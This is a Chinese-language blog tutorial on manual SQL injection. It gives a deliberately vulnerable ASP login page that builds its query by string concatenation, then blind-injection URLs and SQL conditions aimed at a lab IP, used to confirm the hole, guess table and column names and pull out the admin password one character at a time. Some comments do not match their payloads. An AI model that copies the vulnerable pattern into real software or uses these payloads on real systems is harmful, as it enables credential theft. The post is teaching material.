SQL手工注入测试

最新推荐文章于 2024-06-05 14:13:37 发布
最新推荐文章于 2024-06-05 14:13:37 发布
阅读量5.6k 收藏 2
点赞数
分类专栏: 渗透相关 ASP/php/脚本相关
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SysProgram/article/details/52654522
版权
login.html 
<html>
<head><title>请登录</title></head>
<body>
 <div align="center">
   <form action="login.asp" method="post">
          请输入密码:
          <br><br>
          用 户:<input name="name" type="textbox">
          <br>
          密 码:<input name="pass" type="password">
          <br>
          <input value="登录" type="submit">
  </form>
 </div>
</body>
</html>

login.asp 
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>登录</title>
</head>
<body>
<%
inname=Request("name")
inpass=Request("pass")

set conn=server.createobject("ADODB.CONNECTION")
conn.open "Provider=microsoft.jet.oledb.4.0; Data Source="+server.mappath("/data.db")
sqlstr="SELECT * FROM data Where uname='" & inname & "'"

select * from data where name = 'admin' and 1=1 and 'a'='a'
Set rs=conn.Execute(sqlstr)

if inpass=rs("pass") then	
  response.write("<h3>登录成功!</h3>")
  response.write("用户编号:" & rs("uid") & "<br>")
else
  response.write("登录失败!")
end if

Set rs=Nothing
conn.close
%>
</body>
</html>

参数: http://192.168.10.1/login.asp?pass=test&name=test

原SQL语句:SELECT * FROM data Where uname='test'

1.构造能执行的SQL语句

http://192.168.10.1/login.asp?pass=test&name=test' and 1=1 and 'a'='a
相当于执行SQL语句为SELECT * FROM data Where uname='test' and 1=1 and 'a'='a'
如果执行成功,1=1就是我们可能执行的SQL语句

2.猜表名

将1=1替换 (select count(*) from data)>0
http://192.168.10.1/login.asp?pass=test&name=test' and (select count(*) from data)>0 and 'a'='a
相当于执行SQL语句
SELECT * FROM data Where uname='test' and (select count(*) from data)>0'

3.猜用户名字段

(select count(name) from data)>0


4.猜密码字段

(select count(pass) from data)>0


5.猜密码长度

//判断密码长度大于1

(Select count(*) from data where name='admin' and len(pass)>1)>0  

//判断密码长度大于10

(Select count(*) from data where name='admin' and len(pass)<10)>0


6.逐位猜密码

//猜测第1位密码是否为数字
(Select count(*) from data where uname='admin' and mid(pass,1,1)<'9')>0

//猜测第1位密码是否为字母

(Select count(*) from data where uname='admin' and mid(pass,1,1)>'a')>0

//猜测第1位密码是否等于c

(Select count(*) from data where uname='admin' and mid(pass,2,1)='c')>0


sysprogram
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql手工注入实战
mulincong的博客
05-30 2248
sql手工注入封神台靶场
Shell编程脚本
m0_48368237的博客
11-03 448
Shell脚本编程 l Shell命令行的运行 l编写、修改权限和执行Shell程序的步骤 在Shell程序中使用参数和变量 表达式比较、循环结构语句和条件结构语句 在Shell程序中使用函数和调用其他Shell程序 Shell命令行书写规则 u Shell命令行的书写规则 对Shell命令行基本功能的理解有助于编写更好的Shell程序,在执行Shell命令时多个命令可以在一个命令行上运行,但此时要使用分号(;)分隔命令,例如: [root@localhost root]# ls a* -l;free;
渗透测试sql注入
weixin_46420165的博客
12-08 2172
SQL 注入SQL Injection)是发生在 Web 程序中数据库层的安全漏洞,是网站存在最多也是最简单的漏洞。主要原因是程序对用户输入数据的合法性没有判断和处理,导致攻击者可以在 Web 应用程序中事先定义好的 SQL 语句中添加额外的 SQL 语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步获取到数据信息。
sql注入详解
最新发布
Cairo_A的博客
06-05 871
SQL注入是由于程序没有对用户输入数据的合法性进行验证和过滤,导致SQL查询语句被恶意拼接从 而产生SQL注入
SQL注入手工注入常用的语句
yusakul的博客
11-19 2454
判断是否存在注入 and 1=1 / and 1=2 回显页面不同(整形判断) 输入and 1=1和and 1=2后发现页面没有变化,判断不是整型注入 输入’ and 1=1 %23和 ’ and 1=2%23后发现页面变化,判断为字符注入 在数据库中 1=1 和1=2 后面随便输入字符串(相当于1=1和1=2后面的查询语句),发现select 1=&amp;quot;1dasd&amp;quot;时返回1正确,1=&amp;quot;2das...
Sql注入(手工注入思路、绕过、防御)
Naive的博客
09-26 2467
SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
SQL注入基础原理与案例(详细总结)
剁椒鱼头没剁椒的博客
10-20 6565
本篇总结了学习SQL注入的笔记,暂时没总结WAF绕过方面的内容,后期会对WAF绕过进行总结。目前先总结一些基础的东西,可能有些参数不全,具体的参数或者函数可以百度搜索一下。发生在 Web 程序中数据库层的安全漏洞,是网站存在最多也是最简单的漏洞。主要原因是程序对用户输入数据的合法性没有判断和处理,导致攻击者可以在 Web 应用程序中事先定义好的 SQL 语句中添加额外的 SQL 语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步获取到数据信息。
sql手工注入
admin的博客
10-27 809
按照数据提交的方式来分类 友情链接:https://www.cnblogs.com/-chenxs/p/11614129.html、https://www.cnblogs.com/p0pl4r/p/10320631.html (1)GET 注入 提交数据的方式是 GET , 注入点的位置在 GET 参数部分。比如有这样的一个链接http://xxx.com/news.php?id=1 , id 是注入点。 (2)POST 注入 使用 POST 方式提交数据,注入点位置在 POST 数据部分,常发生在表单中。
SQL注入-04】报错注入案例
m0_64378913的博客
04-26 1498
目录1 报错注入概述2 常用的报错注入命令2.2 group by重复键冲突(count()+floor()+rand()+group by组合)2.2.1 group by重复键冲突的原理及bug演示2.2.2 补充:sql语句解析过程2.3 XPATH报错2.3.1 extractvalue()函数2.3.2 updatexml()函数2.4 测试失败的命令3 报错注入案例3.1 操作环境3.2 获取敏感信息3.2.1 获取数据库名3.2.2 获取表名3.2.3 获取字段名3.2.4 获取字段内
渗透测试——sql注入进阶/基于时间的盲注/一看就会/
ChenD的学习笔记
10-06 1764
基于时间的盲注
安全测试SQL注入攻击
热门推荐
小太阳~
01-26 1万+
一、SQL注入攻击的概念 首先说一下,攻击者之所以可以利用自己输入的数据来达到攻击网站的目的,原因就在于SQL语言作为一种解释型语言,它的数据其实是由程序员编写的代码和用户提交的数据共同组成的。正是因为这个原因,攻击者可以构造对自己有利的数据,利用网站的一些SQL漏洞来达到恶意的目的。 SQL注入,就是指攻击者将恶意的字符串或者语句等信息作为参数输入,服务器在验证这个字段的时候,读取攻击者输入的
sql注入测试脚本
03-17
sql注入常用的测试语句大全,方便进行渗透测试sql注入测试
手工注入方法,方便大家测试程序漏洞
daxin09的专栏
03-03 876
1、加入单引号 ’提交,  结果:如果出现错误提示,则该网站可能就存在注入漏洞。  2、数字型判断是否有注入; 语句:and 1=1 ;and 1=2 (经典)、' and '1'=1(字符型)  结果:分别返回不同的页面,说明存在注入漏洞.  分析:and 的意思是“和”如果没有过滤我们的语句,and 1=1就会被代入SQL查询语句进行查询, 如果and前后的两条语句都是真的话就不会
(转-收集)MSSQL手工注入语句集合
weixin_30553837的博客
04-16 254
andexists(select*fromsysobjects)//判断是否是MSSQL andexists(select*fromtableName)//判断某表是否存在..tableName为表名 and1=(select@@VERSION)//MSSQL版本 And1=(selectdb_name())//当前数据库名 and1=(select@...
渗透技巧——手动判断注入点(思维导图)
Thunderclap的博客
08-25 565
在渗透测试过程中,在web存在较复杂的情况下需要有针对性的先进性手动测试是否存在注入点,总结如下手动测试思维导图,如下思维导图针对大多数有注入点的场景。
sql注入攻击原理、检测、防范
WangYouJin321的博客
03-14 1639
定义: SQL Injection:就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。 why? 为什么会存在sql...
SQL手工注入
只会666
05-08 3476
折腾了两天终于对sql注入有基本的思路了,先从手工注入理解原理,后续再继续学习sqlmap,很大一部分前辈写的挺好的我就不重复了→→http://blog.csdn.net/emaste_r/article/details/8156108一,总体思路1.找注入点 → 2.猜解表名 → 3.猜解列名 → 4.暴出字段内容 猜解表名时先试试imformation_schema数据库是否被禁用,没有被禁
一个PHP+Mysql手工注入例子
Praifire的博客
07-16 1万+
说下我的基本思路: 1、目标站点环境为:Windows+Apache+Mysql+PHP 2、存在SQL注入,能否直接写一句话木马 3、存在SQL注入,获取数据库中用户口令,登录应用系统后上传webshell 4、获取数据库口令登录phpMyAdimin,用phpMyAdmin写入一句话木马 不想因为使用扫描工具的缘故,导致服务器出现不稳定的现象,所以就纯手工咯。 下面具体来说明下
SQL手工注入基础详解---- MySQL
xabc3000的专栏
05-30 1万+
作者:DragonEgg 信息来源: 噩靈戰隊[Evil-Soul Security Team] http://bbs.x-xox-x.com/     和MySQL数据库搭配在一起的大多数都是PHP脚本,注入在PHP脚本也是非常泛滥的,但在php脚本中,最常见的是数字型的注入,在php注入中我们利用的是union联合查询,如果连union都不能用的话,就只能像ACCESS那样逐字猜解了。
sql手工注入漏洞测试
04-29
下面是手工测试SQL注入漏洞的一般步骤: 1. 确认目标网站是否存在SQL注入漏洞:在输入框中输入一些特殊字符,比如单引号、双引号、分号等等,如果页面返回了错误信息,那么就有可能存在注入漏洞。 2. 确认注入点的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值